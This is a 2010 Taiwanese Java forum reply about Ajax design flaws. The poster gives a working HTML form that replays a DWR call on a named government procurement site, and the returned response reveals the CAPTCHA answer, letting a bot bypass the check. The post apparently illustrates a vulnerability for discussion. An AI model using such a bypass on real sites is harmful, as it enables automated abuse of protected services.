JWorld@TW the best professional Java site in Taiwan
      註冊 | 登入 | 全文檢索 | 排行榜  

» JWorld@TW » AJAX討論區  

按列印兼容模式列印這個話題 列印話題    把這個話題寄給朋友 寄給朋友    訂閱主題
reply to postflat modego to previous topicgo to next topic
本主題所含的標籤
作者 Re:Ajax 與 Session variable 可能發生的漏洞 [Re:Tony1223]
kentyeh





發文: 647
積分: 6
於 2010-11-10 17:15 user profilesend a private message to userreply to postreply to postsearch all posts byselect and copy to clipboard. 
ie only, sorry for netscape users:-)add this post to my favorite list
是資安問題或是設計上的問題?
Anyway,我只是想表達Ajax設計上只要不小心,可能就會發生令人意想不到的問題。

恕我不能提供之前的發現,因為那是牽扯到錢的問題

但是我可以提供另一個比較無害的範例,

請先上這個地方,是不是可以看到上面有個圖形驗證?

一般有圖形驗證的原因是因為不想被機器人讀取,
既然您已上過上述的網址,請取出該網站的 cookie "JSESSIONID"

您可以手動,或是用機器人的方式 查詢
1
2
3
4
5
6
7
8
9
10
11
12
<form action="http://web.pcc.gov.tw/tps/dwr-commonutil/call/plaincall/ImageCheck.obtainImg.dwr" method="post">
       callCount: <input type="text" name="callCount" value="1"/><br/>
       page: <input type="text" name="page" value="/tps/tps/tbm/main/tps/tbm/queryOdiServiceClient.do?method=init"/><br/>
       c0-scriptName :<input type="text" name="c0-scriptName" value="ImageCheck"/><br/>
       c0-methodName :<input type="text" name="c0-methodName" value="obtainImg"/><br/>
       c0-id: <input type="text" name="c0-id" value="0"/><br/>
       batchId: <input type="text" name="batchId" value="0"/><br/>
       c0-param0: <input type="text" name="c0-param0" value=""/><br/>
       httpSessionId: <input type="text" name="httpSessionId" value="設定為cookie JSESSIONID的值"/><br/>
       scriptSessionId: <input type="text" name="scriptSessionId" value=""/><br/>
       <input type="submit">
</form>


以下是我的查詢回傳字串
1
2
3
4
throw 'allowScriptTagRemoting is false.';
//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleCallback('0','0',["/tps/imgPath/1289380039430.jpeg","5AUr"]);


然後我手動驗證這個圖形 http://web.pcc.gov.tw/tps/imgPath/1289380039430.jpeg
果然出現 5AUr 的變形圖

是的,這樣機器人已取得圖形驗證的文字資料了,下一站就是享用該網站的便利服務了…
(除非她的防火牆像Yahooo一樣,會判斷造訪次數來擋)

這就是我說的Ajax使用不當的情形


reply to postreply to post
話題樹型展開
人氣 標題 作者 字數 發文時間
1377 Ajax 與 Session variable 可能發生的漏洞 kentyeh 406 2010-11-09 15:51
1291 Re:Ajax 與 Session variable 可能發生的漏洞 plutotw 33 2010-11-09 16:25
1287 Re:Ajax 與 Session variable 可能發生的漏洞 Tony1223 255 2010-11-09 17:02
1247 Re:Ajax 與 Session variable 可能發生的漏洞 kentyeh 56 2010-11-09 20:55
1237 Re:Ajax 與 Session variable 可能發生的漏洞 kebin_liu 53 2010-11-09 21:12
1294 Re:Ajax 與 Session variable 可能發生的漏洞 Tony1223 165 2010-11-09 21:30
1173 Re:Ajax 與 Session variable 可能發生的漏洞 kentyeh 1612 2010-11-10 17:15
1145 Re:Ajax 與 Session variable 可能發生的漏洞 plutotw 119 2010-11-10 18:29
1149 Re:Ajax 與 Session variable 可能發生的漏洞 kentyeh 229 2010-11-10 18:51
1252 Re:Ajax 與 Session variable 可能發生的漏洞 plutotw 92 2010-11-10 19:06
» JWorld@TW »  AJAX討論區

reply to postflat modego to previous topicgo to next topic
  已讀文章
  新的文章
  被刪除的文章
Jump to the top of page

JWorld@TW 本站商標資訊

Powered by Powerful JuteForum® Version Jute 1.5.8